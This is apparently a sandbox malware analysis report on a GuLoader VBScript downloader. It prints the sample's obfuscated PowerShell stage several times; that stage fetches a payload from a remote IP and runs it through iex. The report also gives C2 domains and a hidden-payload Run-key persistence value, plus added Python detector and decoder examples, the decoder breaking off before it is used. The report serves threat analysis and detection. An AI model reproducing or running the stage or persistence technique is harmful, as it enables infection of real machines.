Malware Analysis Report

2025-08-10 19:27

Sample ID: 230712-lcpnjacf57
Target: Reylon.vbs
SHA256: 82b08d87211f44c871d681e216fcd8ae33f485af2f6737011f187c5a56ac8c56
Tags: guloader downloader persistence
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V6
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score: 10/10

SHA256: 82b08d87211f44c871d681e216fcd8ae33f485af2f6737011f187c5a56ac8c56

Threat Level: Known bad

The file Reylon.vbs was found to be: Known bad.

Malicious Activity Summary

guloader downloader persistence

Guloader,Cloudeye

Blocklisted process makes network request

Checks computer location settings

Checks QEMU agent file

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2023-07-12 09:23

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2023-07-12 09:23
Reported: 2023-07-12 09:26
Platform: win7-20230705-en
Max time kernel: 148s
Max time network: 136s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Reylon.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WScript.exe | N/A

Checks QEMU agent file

Description | Indicator | Process | Target
File opened (read-only) | C:\Program Files\Qemu-ga\qemu-ga.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened (read-only) | C:\Program Files\Qemu-ga\qemu-ga.exe | C:\Program Files (x86)\internet explorer\ieinstal.exe | N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-511725148-388773979-2853099937-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Program Files (x86)\internet explorer\ieinstal.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-511725148-388773979-2853099937-1000\Software\Microsoft\Windows\CurrentVersion\Run\Kalibr = "%Della% -w 1 $Exostrad=(Get-ItemProperty -Path 'HKCU:\\Outglari\\').Part;%Della% ($Exostrad)" | C:\Program Files (x86)\internet explorer\ieinstal.exe | N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\internet explorer\ieinstal.exe | N/A
N/A | N/A | C:\Program Files (x86)\internet explorer\ieinstal.exe | N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Program Files (x86)\internet explorer\ieinstal.exe | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 2348 set thread context of 2668 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\internet explorer\ieinstal.exe

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious behavior: MapViewOfSection

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\internet explorer\ieinstal.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 3052 wrote to memory of 564 (3 events) | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 564 wrote to memory of 2348 (4 events) | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2348 wrote to memory of 2668 (8 events) | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\internet explorer\ieinstal.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Reylon.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Diskussi9 ([String]$Fibrocysto){For($Apha=1; $Apha -lt $Fibrocysto.Length-1; $Apha+=(1+1)){$Laeserfo=$Laeserfo+$Fibrocysto.Substring($Apha, 1)};$Laeserfo;}$Unconfe=Diskussi9 'Wh t t pB: /V/D1 9 4 . 5L5 .W2 2T4D.M1B8B3D/TmMrKk / SBtoySr t h jteM2 0S. p f m ';$Laeserfo01=Diskussi9 'SiLe xK ';$Egenfinan = Diskussi9 'H\Bs y s waorw 6M4A\KWLi nBd oMwUsUPPoAwAe rSSEhGeFl l \vv 1R. 0 \UpHoewSe rMsBhFeBl lK.IeSx eD ';.($Laeserfo01) (Diskussi9 'G$ OGvIe rR2 =S$ e nMv : wRiDnsd i rA ') ;.($Laeserfo01) (Diskussi9 ' $SE gSe nFfBiFn aDn = $SOSv eIrF2N+I$ E gFe nOf i nja n ') ;.($Laeserfo01) (Diskussi9 'H$FTboLn iae rNgDaPt eu M= (f( gGwEmBiU w iRnR3E2G_SpArBoRcUe sAsu -KFE MP rDo cGe s sDI dc=A$U{VP IHDB}P)U. C oDmPm aPnPdULUiVn eC) -As pFlSi tG V[Dc h aArU]U3R4T ');.($Laeserfo01) (Diskussi9 'V$ F o cvaIlHoA U=K $ETSoKn iSefrEgRaKtMe [M$ATIo n iReQrCgIaGt e .BcSoSu nUtC-M2L] ');.($Laeserfo01) (Diskussi9 'I$CKPa mBm e rHtA=B( THeFsVt -KPIaSt h S$BE gKe n fSiCn aSnC)B - AUn dL A(T[QIPn tAPItCrD]H:R:Rs iUz eE - e qF L8 )B ') ;if ($Kammert) {.$Egenfinan $Focalo;} else {;$Laeserfo00=Diskussi9 'BSRt aGr tC-IBKi tKsET r aBnSsSf eCr -RS o uFr cBe r$cU n c o nRf e -SD e sStMi n aFtSi o nC P$ OSvpeKrs2C ';.($Laeserfo01) (Diskussi9 ' $UORv eRrM2E= $Me nFvP: a pHpIdCaLt aM ') ;.($Laeserfo01) (Diskussi9 'IITm pDoAr tC- Meo dOudlSe RB iStksBT rDaBn s f eFrG ') ;$Over2=$Over2+'\Fattenl.Stu';while (-not $Webs) {.($Laeserfo01) (Diskussi9 'L$BW e bBs =F( TSe s t - PEaHtTh L$GODvOe rK2H)S ') ;.($Laeserfo01) $Laeserfo00;.($Laeserfo01) (Diskussi9 'dSBt a rut - SEl efeEpU 5R ');}.($Laeserfo01) (Diskussi9 ' $ID iTsSk uRs s i S=S MGPeStA- CFoSnSt eHn tB $BORv eLrR2R ');.($Laeserfo01) (Diskussi9 'U$DAFbWiSlTl apgTe b r = P[sS ytsStPePmF.TCPobnBvDe rDt ] :O: F r oCm BRaKsAeS6 4PS tHr i nBgS( $nD iNsEk uOsUsTiP)a ');.($Laeserfo01) (Diskussi9 ' $ L aCe s eBr f oL2 =P [SS yOsAtneLm .STke xRtP.ME njc oBdMiBnSgS] :T: AFSFCFISI .RGCe t S 
tCr i n g ( $PAFbEi lKl aEg e b rT) ');.($Laeserfo01) (Diskussi9 ' $VNPa t ulrWgK= $kLXaAeUs eCrCfeo 2I. sEu b s tGrWi nEgA( 2Z1 0T8B3D1F,L1L9S0 6T2 ) ');.($Laeserfo01) $Naturg;}"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Diskussi9 ([String]$Fibrocysto){For($Apha=1; $Apha -lt $Fibrocysto.Length-1; $Apha+=(1+1)){$Laeserfo=$Laeserfo+$Fibrocysto.Substring($Apha, 1)};$Laeserfo;}$Unconfe=Diskussi9 'Wh t t pB: /V/D1 9 4 . 5L5 .W2 2T4D.M1B8B3D/TmMrKk / SBtoySr t h jteM2 0S. p f m ';$Laeserfo01=Diskussi9 'SiLe xK ';$Egenfinan = Diskussi9 'H\Bs y s waorw 6M4A\KWLi nBd oMwUsUPPoAwAe rSSEhGeFl l \vv 1R. 0 \UpHoewSe rMsBhFeBl lK.IeSx eD ';.($Laeserfo01) (Diskussi9 'G$ OGvIe rR2 =S$ e nMv : wRiDnsd i rA ') ;.($Laeserfo01) (Diskussi9 ' $SE gSe nFfBiFn aDn = $SOSv eIrF2N+I$ E gFe nOf i nja n ') ;.($Laeserfo01) (Diskussi9 'H$FTboLn iae rNgDaPt eu M= (f( gGwEmBiU w iRnR3E2G_SpArBoRcUe sAsu -KFE MP rDo cGe s sDI dc=A$U{VP IHDB}P)U. C oDmPm aPnPdULUiVn eC) -As pFlSi tG V[Dc h aArU]U3R4T ');.($Laeserfo01) (Diskussi9 'V$ F o cvaIlHoA U=K $ETSoKn iSefrEgRaKtMe [M$ATIo n iReQrCgIaGt e .BcSoSu nUtC-M2L] ');.($Laeserfo01) (Diskussi9 'I$CKPa mBm e rHtA=B( THeFsVt -KPIaSt h S$BE gKe n fSiCn aSnC)B - AUn dL A(T[QIPn tAPItCrD]H:R:Rs iUz eE - e qF L8 )B ') ;if ($Kammert) {.$Egenfinan $Focalo;} else {;$Laeserfo00=Diskussi9 'BSRt aGr tC-IBKi tKsET r aBnSsSf eCr -RS o uFr cBe r$cU n c o nRf e -SD e sStMi n aFtSi o nC P$ OSvpeKrs2C ';.($Laeserfo01) (Diskussi9 ' $UORv eRrM2E= $Me nFvP: a pHpIdCaLt aM ') ;.($Laeserfo01) (Diskussi9 'IITm pDoAr tC- Meo dOudlSe RB iStksBT rDaBn s f eFrG ') ;$Over2=$Over2+'\Fattenl.Stu';while (-not $Webs) {.($Laeserfo01) (Diskussi9 'L$BW e bBs =F( TSe s t - PEaHtTh L$GODvOe rK2H)S ') ;.($Laeserfo01) $Laeserfo00;.($Laeserfo01) (Diskussi9 'dSBt a rut - SEl efeEpU 5R ');}.($Laeserfo01) (Diskussi9 ' $ID iTsSk uRs s i S=S MGPeStA- CFoSnSt eHn tB $BORv eLrR2R ');.($Laeserfo01) (Diskussi9 'U$DAFbWiSlTl apgTe b r = P[sS ytsStPePmF.TCPobnBvDe rDt ] :O: F r oCm BRaKsAeS6 4PS tHr i nBgS( $nD iNsEk uOsUsTiP)a ');.($Laeserfo01) (Diskussi9 ' $ L aCe s eBr f oL2 =P [SS yOsAtneLm .STke xRtP.ME njc oBdMiBnSgS] :T: AFSFCFISI .RGCe t S 
tCr i n g ( $PAFbEi lKl aEg e b rT) ');.($Laeserfo01) (Diskussi9 ' $VNPa t ulrWgK= $kLXaAeUs eCrCfeo 2I. sEu b s tGrWi nEgA( 2Z1 0T8B3D1F,L1L9S0 6T2 ) ');.($Laeserfo01) $Naturg;}"

C:\Program Files (x86)\internet explorer\ieinstal.exe

"C:\Program Files (x86)\internet explorer\ieinstal.exe"

Network

Country | Destination | Domain | Proto
TR | 194.55.224.183:80 | 194.55.224.183 | tcp
TR | 194.55.224.183:80 | 194.55.224.183 | tcp
TR | 194.55.224.183:80 | 194.55.224.183 | tcp
US | 8.8.8.8:53 | top.abuse1disabled.xyz | udp
NL | 134.19.179.139:5631 | top.abuse1disabled.xyz | tcp
US | 8.8.8.8:53 | sub.abuse2disabled.xyz | udp
US | 199.249.230.37:5631 | sub.abuse2disabled.xyz | tcp
DE | 38.242.234.206:5631 |  | tcp
US | 8.8.8.8:53 | geoplugin.net | udp
NL | 178.237.33.50:80 | geoplugin.net | tcp

Files

C:\Users\Admin\AppData\Local\Temp\Cab765B.tmp

MD5 3ac860860707baaf32469fa7cc7c0192
SHA1 c33c2acdaba0e6fa41fd2f00f186804722477639
SHA256 d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904
SHA512 d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

memory/564-74-0x00000000026E0000-0x0000000002760000-memory.dmp

memory/564-75-0x000000001B420000-0x000000001B702000-memory.dmp

memory/564-76-0x0000000001F40000-0x0000000001F48000-memory.dmp

memory/564-77-0x00000000026E0000-0x0000000002760000-memory.dmp

memory/564-78-0x00000000026E0000-0x0000000002760000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0S6AHN3HR5DX9LVALPHG.temp

MD5 271ae57e5fe7ec7130268737b82214b5
SHA1 be8854b23b036dc02c441b7975f0d3c5291f1213
SHA256 fd950c53f966e28f87c20d132f718a54534709640e4e6a5c79fb5a8ca42a83ac
SHA512 a3f9777fa851e5248cba54dd54ee5456d58abe07cc644ae6df6f7d5fd1a8df150b5eaeda76d128a7b0a9f0801156ac203bfe2808b3aa2d99f0128abea2a7a699

memory/2348-82-0x00000000026B0000-0x00000000026F0000-memory.dmp

memory/2348-81-0x00000000026B0000-0x00000000026F0000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 770d8350daae6c7f2b5b25ca43f3522a
SHA1 c96b106e2d7bba04ba7c36458739a8825d42a189
SHA256 a771ab56702938dc05d65cebb57c6697b5ce152330222abc36775107e131d0ab
SHA512 421a70e8b4c4ef6182d542c622a5139c820d1bfe58ab8bcc3240f62263cc5c6df16a68319e144930f5320f9cb2e9242d9c60e6ba7b71f4f9ee7f84486c2db084

C:\Users\Admin\AppData\Local\Temp\TarBC6E.tmp

MD5 4ff65ad929cd9a367680e0e5b1c08166
SHA1 c0af0d4396bd1f15c45f39d3b849ba444233b3a2
SHA256 c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6
SHA512 f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27

memory/564-93-0x00000000026E0000-0x0000000002760000-memory.dmp

memory/564-94-0x00000000026E0000-0x0000000002760000-memory.dmp

memory/564-95-0x00000000026E0000-0x0000000002760000-memory.dmp

memory/2348-97-0x00000000026B0000-0x00000000026F0000-memory.dmp

memory/2348-98-0x00000000026B0000-0x00000000026F0000-memory.dmp

memory/2348-96-0x00000000026B0000-0x00000000026F0000-memory.dmp

memory/2348-99-0x0000000005F60000-0x0000000009927000-memory.dmp

memory/2348-100-0x0000000005010000-0x0000000005011000-memory.dmp

memory/2668-103-0x0000000000C20000-0x00000000045E7000-memory.dmp

memory/2668-104-0x0000000000C20000-0x00000000045E7000-memory.dmp

memory/2668-106-0x0000000000C20000-0x00000000045E7000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted: 2023-07-12 09:23
Reported: 2023-07-12 09:26
Platform: win10v2004-20230703-en
Max time kernel: 150s
Max time network: 152s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Reylon.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WScript.exe | N/A

Checks QEMU agent file

Description | Indicator | Process | Target
File opened (read-only) | C:\Program Files\Qemu-ga\qemu-ga.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened (read-only) | C:\Program Files\Qemu-ga\qemu-ga.exe | C:\Program Files (x86)\internet explorer\ieinstal.exe | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Program Files (x86)\internet explorer\ieinstal.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Kalibr = "%Della% -w 1 $Exostrad=(Get-ItemProperty -Path 'HKCU:\\Outglari\\').Part;%Della% ($Exostrad)" | C:\Program Files (x86)\internet explorer\ieinstal.exe | N/A
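The Kalibr Run value above (the same value is recorded under behavioral1) does not point at a binary. It starts with an environment-variable reference, %Della%, asks for a hidden window (-w 1), reads the real payload from the Part value under HKCU:\Outglari with Get-ItemProperty, and hands that data straight back to %Della% for execution, so the Run key alone never reveals the interpreter or the code. The following is an added example, not code from the report or the sandbox vendor: a Python checker for Run values of this shape, run against the value copied from the report and a constructed benign value. It assumes %Della% resolves to a script interpreter; the report does not show where that variable is set.

```python
import re

# Added example (not from the report). Flags Run-key values that launch through an
# environment variable and fetch their payload from another registry value.

# Value data copied from the report's Run\Kalibr entry.
KALIBR = r"%Della% -w 1 $Exostrad=(Get-ItemProperty -Path 'HKCU:\\Outglari\\').Part;%Della% ($Exostrad)"
# Constructed benign value for comparison (not from the report).
BENIGN = r'"C:\Program Files\Vendor\Updater.exe" /background'

PAYLOAD_RE = re.compile(
    r"\$(\w+)\s*=\s*\(Get-ItemProperty\s+-Path\s+'([^']+)'\)\.(\w+)", re.I)

def analyse_run_value(data: str) -> dict:
    """Return the persistence indicators found in one Run value's data."""
    f = {"launcher_env": None, "hidden_window": False, "payload_key": None,
         "payload_value": None, "invokes_fetched_data": False}
    # The command begins with %NAME% instead of an executable path: the real
    # interpreter is hidden behind a (presumably per-user) environment variable.
    m = re.match(r"%(\w+)%", data)
    if m:
        f["launcher_env"] = m.group(1)
    # -w 1 / -WindowStyle Hidden: a PowerShell-style hidden-window switch.
    f["hidden_window"] = bool(
        re.search(r"-w(?:indowstyle)?\s+(?:1|hidden)\b", data, re.I))
    # $var=(Get-ItemProperty -Path 'HKCU:\...').Value: payload stored in the registry.
    m = PAYLOAD_RE.search(data)
    if m:
        var, path, f["payload_value"] = m.groups()
        # The data writes the path with doubled backslashes; normalise for reporting.
        f["payload_key"] = re.sub(r"\\+", r"\\", path).rstrip("\\")
        # The fetched data is passed back to the same launcher: %NAME% ($var).
        if f["launcher_env"]:
            f["invokes_fetched_data"] = bool(re.search(
                rf"%{f['launcher_env']}%\s*\(\s*\${var}\s*\)", data))
    hits = sum([f["launcher_env"] is not None, f["hidden_window"],
                f["payload_key"] is not None, f["invokes_fetched_data"]])
    f["verdict"] = "suspicious" if hits >= 2 else "benign"
    return f

if __name__ == "__main__":
    for name, data in (("Kalibr", KALIBR), ("constructed benign", BENIGN)):
        print(name, analyse_run_value(data))
```

On a live host the same check is applied to the output of Get-ItemProperty on HKCU:\Software\Microsoft\Windows\CurrentVersion\Run, and the finding is only complete once the launcher variable (here Della, expected under HKCU:\Environment if it is per-user) and the HKCU:\Outglari\Part data have been collected as well.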

Suspicious use of NtCreateThreadExHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\internet explorer\ieinstal.exe | N/A
N/A | N/A | C:\Program Files (x86)\internet explorer\ieinstal.exe | N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Program Files (x86)\internet explorer\ieinstal.exe | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 1580 set thread context of 3368 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\internet explorer\ieinstal.exe

Enumerates physical storage devices

Suspicious behavior: MapViewOfSection

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\internet explorer\ieinstal.exe | N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Reylon.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Diskussi9 ([String]$Fibrocysto){For($Apha=1; $Apha -lt $Fibrocysto.Length-1; $Apha+=(1+1)){$Laeserfo=$Laeserfo+$Fibrocysto.Substring($Apha, 1)};$Laeserfo;}$Unconfe=Diskussi9 'Wh t t pB: /V/D1 9 4 . 5L5 .W2 2T4D.M1B8B3D/TmMrKk / SBtoySr t h jteM2 0S. p f m ';$Laeserfo01=Diskussi9 'SiLe xK ';$Egenfinan = Diskussi9 'H\Bs y s waorw 6M4A\KWLi nBd oMwUsUPPoAwAe rSSEhGeFl l \vv 1R. 0 \UpHoewSe rMsBhFeBl lK.IeSx eD ';.($Laeserfo01) (Diskussi9 'G$ OGvIe rR2 =S$ e nMv : wRiDnsd i rA ') ;.($Laeserfo01) (Diskussi9 ' $SE gSe nFfBiFn aDn = $SOSv eIrF2N+I$ E gFe nOf i nja n ') ;.($Laeserfo01) (Diskussi9 'H$FTboLn iae rNgDaPt eu M= (f( gGwEmBiU w iRnR3E2G_SpArBoRcUe sAsu -KFE MP rDo cGe s sDI dc=A$U{VP IHDB}P)U. C oDmPm aPnPdULUiVn eC) -As pFlSi tG V[Dc h aArU]U3R4T ');.($Laeserfo01) (Diskussi9 'V$ F o cvaIlHoA U=K $ETSoKn iSefrEgRaKtMe [M$ATIo n iReQrCgIaGt e .BcSoSu nUtC-M2L] ');.($Laeserfo01) (Diskussi9 'I$CKPa mBm e rHtA=B( THeFsVt -KPIaSt h S$BE gKe n fSiCn aSnC)B - AUn dL A(T[QIPn tAPItCrD]H:R:Rs iUz eE - e qF L8 )B ') ;if ($Kammert) {.$Egenfinan $Focalo;} else {;$Laeserfo00=Diskussi9 'BSRt aGr tC-IBKi tKsET r aBnSsSf eCr -RS o uFr cBe r$cU n c o nRf e -SD e sStMi n aFtSi o nC P$ OSvpeKrs2C ';.($Laeserfo01) (Diskussi9 ' $UORv eRrM2E= $Me nFvP: a pHpIdCaLt aM ') ;.($Laeserfo01) (Diskussi9 'IITm pDoAr tC- Meo dOudlSe RB iStksBT rDaBn s f eFrG ') ;$Over2=$Over2+'\Fattenl.Stu';while (-not $Webs) {.($Laeserfo01) (Diskussi9 'L$BW e bBs =F( TSe s t - PEaHtTh L$GODvOe rK2H)S ') ;.($Laeserfo01) $Laeserfo00;.($Laeserfo01) (Diskussi9 'dSBt a rut - SEl efeEpU 5R ');}.($Laeserfo01) (Diskussi9 ' $ID iTsSk uRs s i S=S MGPeStA- CFoSnSt eHn tB $BORv eLrR2R ');.($Laeserfo01) (Diskussi9 'U$DAFbWiSlTl apgTe b r = P[sS ytsStPePmF.TCPobnBvDe rDt ] :O: F r oCm BRaKsAeS6 4PS tHr i nBgS( $nD iNsEk uOsUsTiP)a ');.($Laeserfo01) (Diskussi9 ' $ L aCe s eBr f oL2 =P [SS yOsAtneLm .STke xRtP.ME njc oBdMiBnSgS] :T: AFSFCFISI .RGCe t S 
tCr i n g ( $PAFbEi lKl aEg e b rT) ');.($Laeserfo01) (Diskussi9 ' $VNPa t ulrWgK= $kLXaAeUs eCrCfeo 2I. sEu b s tGrWi nEgA( 2Z1 0T8B3D1F,L1L9S0 6T2 ) ');.($Laeserfo01) $Naturg;}"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Diskussi9 ([String]$Fibrocysto){For($Apha=1; $Apha -lt $Fibrocysto.Length-1; $Apha+=(1+1)){$Laeserfo=$Laeserfo+$Fibrocysto.Substring($Apha, 1)};$Laeserfo;}$Unconfe=Diskussi9 'Wh t t pB: /V/D1 9 4 . 5L5 .W2 2T4D.M1B8B3D/TmMrKk / SBtoySr t h jteM2 0S. p f m ';$Laeserfo01=Diskussi9 'SiLe xK ';$Egenfinan = Diskussi9 'H\Bs y s waorw 6M4A\KWLi nBd oMwUsUPPoAwAe rSSEhGeFl l \vv 1R. 0 \UpHoewSe rMsBhFeBl lK.IeSx eD ';.($Laeserfo01) (Diskussi9 'G$ OGvIe rR2 =S$ e nMv : wRiDnsd i rA ') ;.($Laeserfo01) (Diskussi9 ' $SE gSe nFfBiFn aDn = $SOSv eIrF2N+I$ E gFe nOf i nja n ') ;.($Laeserfo01) (Diskussi9 'H$FTboLn iae rNgDaPt eu M= (f( gGwEmBiU w iRnR3E2G_SpArBoRcUe sAsu -KFE MP rDo cGe s sDI dc=A$U{VP IHDB}P)U. C oDmPm aPnPdULUiVn eC) -As pFlSi tG V[Dc h aArU]U3R4T ');.($Laeserfo01) (Diskussi9 'V$ F o cvaIlHoA U=K $ETSoKn iSefrEgRaKtMe [M$ATIo n iReQrCgIaGt e .BcSoSu nUtC-M2L] ');.($Laeserfo01) (Diskussi9 'I$CKPa mBm e rHtA=B( THeFsVt -KPIaSt h S$BE gKe n fSiCn aSnC)B - AUn dL A(T[QIPn tAPItCrD]H:R:Rs iUz eE - e qF L8 )B ') ;if ($Kammert) {.$Egenfinan $Focalo;} else {;$Laeserfo00=Diskussi9 'BSRt aGr tC-IBKi tKsET r aBnSsSf eCr -RS o uFr cBe r$cU n c o nRf e -SD e sStMi n aFtSi o nC P$ OSvpeKrs2C ';.($Laeserfo01) (Diskussi9 ' $UORv eRrM2E= $Me nFvP: a pHpIdCaLt aM ') ;.($Laeserfo01) (Diskussi9 'IITm pDoAr tC- Meo dOudlSe RB iStksBT rDaBn s f eFrG ') ;$Over2=$Over2+'\Fattenl.Stu';while (-not $Webs) {.($Laeserfo01) (Diskussi9 'L$BW e bBs =F( TSe s t - PEaHtTh L$GODvOe rK2H)S ') ;.($Laeserfo01) $Laeserfo00;.($Laeserfo01) (Diskussi9 'dSBt a rut - SEl efeEpU 5R ');}.($Laeserfo01) (Diskussi9 ' $ID iTsSk uRs s i S=S MGPeStA- CFoSnSt eHn tB $BORv eLrR2R ');.($Laeserfo01) (Diskussi9 'U$DAFbWiSlTl apgTe b r = P[sS ytsStPePmF.TCPobnBvDe rDt ] :O: F r oCm BRaKsAeS6 4PS tHr i nBgS( $nD iNsEk uOsUsTiP)a ');.($Laeserfo01) (Diskussi9 ' $ L aCe s eBr f oL2 =P [SS yOsAtneLm .STke xRtP.ME njc oBdMiBnSgS] :T: AFSFCFISI .RGCe t S 
tCr i n g ( $PAFbEi lKl aEg e b rT) ');.($Laeserfo01) (Diskussi9 ' $VNPa t ulrWgK= $kLXaAeUs eCrCfeo 2I. sEu b s tGrWi nEgA( 2Z1 0T8B3D1F,L1L9S0 6T2 ) ');.($Laeserfo01) $Naturg;}"

C:\Program Files (x86)\internet explorer\ieinstal.exe

"C:\Program Files (x86)\internet explorer\ieinstal.exe"
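The PowerShell command lines above (identical to the ones under behavioral1) build every meaningful string through the Diskussi9 function, which keeps every second character of its argument and drops the rest. What follows is an added example, not code from the report or from the sandbox vendor: a Python re-implementation of that decoder applied to the literals the stage passes to Diskussi9. It recovers the download URL, the 32-bit PowerShell path the stage appends to $env:windir to relaunch itself (C:\Windows is assumed for $env:windir, which the process list bears out), the name appended to $env:appdata for the downloaded file, and the final substring step that feeds iex. One caveat a reader of this page needs: the report was rendered through HTML, which collapses runs of spaces, so several literals on the page have lost a character and their odd/even alternation no longer decodes; the example uses only literals that decode cleanly.

```python
import re

# Added example (not from the report or the sandbox vendor): re-implementation of the
# Diskussi9 string decoder from the quoted PowerShell stage, applied to its literals.

def diskussi9(s: str) -> str:
    """Keep characters at indices 1, 3, 5, ... while index < len(s) - 1, which is
    exactly `For($Apha=1; $Apha -lt $Fibrocysto.Length-1; $Apha+=(1+1))`."""
    return s[1:len(s) - 1:2]

# Statements copied from the quoted stage; the statements between them are omitted.
STAGE = (
    "$Unconfe=Diskussi9 'Wh t t pB: /V/D1 9 4 . 5L5 .W2 2T4D.M1B8B3D/TmMrKk / SBtoySr t h jteM2 0S. p f m ';"
    "$Laeserfo01=Diskussi9 'SiLe xK ';"
    r"$Egenfinan = Diskussi9 'H\Bs y s waorw 6M4A\KWLi nBd oMwUsUPPoAwAe rSSEhGeFl l \vv 1R. 0 \UpHoewSe rMsBhFeBl lK.IeSx eD ';"
    ".($Laeserfo01) (Diskussi9 'G$ OGvIe rR2 =S$ e nMv : wRiDnsd i rA ') ;"
    ".($Laeserfo01) (Diskussi9 ' $SE gSe nFfBiFn aDn = $SOSv eIrF2N+I$ E gFe nOf i nja n ') ;"
    r"$Over2=$Over2+'\Fattenl.Stu';"
    ".($Laeserfo01) (Diskussi9 ' $VNPa t ulrWgK= $kLXaAeUs eCrCfeo 2I. sEu b s tGrWi nEgA( 2Z1 0T8B3D1F,L1L9S0 6T2 ) ');"
)

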